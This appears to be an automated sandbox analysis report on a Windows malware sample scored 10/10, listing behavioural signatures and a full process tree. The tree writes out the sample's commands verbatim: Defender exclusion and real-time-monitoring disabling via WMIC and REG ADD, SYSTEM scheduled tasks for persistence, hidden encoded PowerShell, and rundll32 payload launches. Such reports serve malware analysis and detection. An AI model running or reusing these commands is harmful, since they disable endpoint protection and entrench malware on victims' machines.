Analysis
-
max time kernel
231s -
max time network
236s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
25-04-2024 02:08
General
-
Target
4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe
-
Size
6.4MB
-
MD5
43798253e6d8bf646957078c091972b6
-
SHA1
da192fc0d684717cf872dce47a2c06d718f2836e
-
SHA256
4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa
-
SHA512
51a6076d714c5a6548a9c75cecb554e1322f0d00b1c6595f5fd987ad3bd8af459f02a2ef55c649fa9a8635a2cd8b24588f712d4ba020a2aa4bc2217bf4e6cbe1
-
SSDEEP
196608:91OU2zjVpYD8vDwJmaHxbS2Os9qP0eE7xx:3OU2tpRvDqRbhOZ0f7xx
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 24 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe"C:\Users\Admin\AppData\Local\Temp\4a6a030c131886f8d79b4b362b386feb1ce93b7b2bc2cc1af4f8d48ffe5419aa.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe.\Install.exe /RCQdidXww "525403" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 02:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\BQBmpdy.exe\" ZO /Eusite_idvdw 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {103C30DC-7D51-490C-8A5F-8695CB8C2068} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\BQBmpdy.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\BQBmpdy.exe ZO /Eusite_idvdw 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYhrMTDvp" /SC once /ST 01:31:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYhrMTDvp"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYhrMTDvp"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSvQZxnOk" /SC once /ST 00:15:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSvQZxnOk"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSvQZxnOk"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\heXdjphsLYtTYYrU\tguKzFKr\DdRzdOBRShhqSKqt.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\heXdjphsLYtTYYrU\tguKzFKr\DdRzdOBRShhqSKqt.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUZrHWkJT" /SC once /ST 00:33:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUZrHWkJT"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUZrHWkJT"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 00:51:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LLZOGWO.exe\" ob /TGsite_idRcf 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qXnxKrbPbFSTFetyh"3⤵
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LLZOGWO.exeC:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LLZOGWO.exe ob /TGsite_idRcf 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJLDvKxDU\YmStfu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZPVskaMeORyUtyn" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZPVskaMeORyUtyn2" /F /xml "C:\Program Files (x86)\OJLDvKxDU\rcGRmxA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZPVskaMeORyUtyn"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZPVskaMeORyUtyn"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yrjCurKJXOthHv" /F /xml "C:\Program Files (x86)\jDcnSjPvYahU2\zpZBKfZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NetXkRqHZJDfE2" /F /xml "C:\ProgramData\mMAjWdbxOIjSziVB\vusPJQT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YkvMZvjGAPbigdKuX2" /F /xml "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\pzUsmyw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nQHiQOLyvgcbJIDARWU2" /F /xml "C:\Program Files (x86)\qpZxqHvFKXpRC\OKtpDTB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EJKQCvUwFyvoZzoaf" /SC once /ST 01:37:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dll\",#1 /Bwsite_idhNx 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EJKQCvUwFyvoZzoaf"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qXnxKrbPbFSTFetyh"3⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dll",#1 /Bwsite_idhNx 5254032⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\Lvtzfkno\SgbcBWQ.dll",#1 /Bwsite_idhNx 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EJKQCvUwFyvoZzoaf"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {042C4C53-910C-4ABE-9448-A943A2A3CBFF} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
